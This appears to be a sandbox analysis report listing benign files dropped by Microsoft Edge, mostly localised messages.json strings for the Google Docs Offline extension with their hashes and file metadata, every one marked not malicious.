                                                                                                                                                                                                                                                                                              MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                              SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                              SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                              SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                              MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                              SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                              SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                              SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                              MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                              SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                              SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                              SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1613
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                              MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                              SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                              SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                              SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):848
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                              MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                              SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                              SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                              SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1425
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                              MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                              SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                              SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                              SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):961
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                              MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                              SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                              SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                              SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):959
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                              MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                              SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                              SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                              SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):968
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                              MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                              SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                              SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                              SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):838
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                              MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                              SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                              SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                              SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1305
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                              MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                              SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                              SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                              SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):911
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                              MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                              SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                              SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                              SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):939
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                              MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                              SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                              SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                              SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                              MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                              SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                              SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                              SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
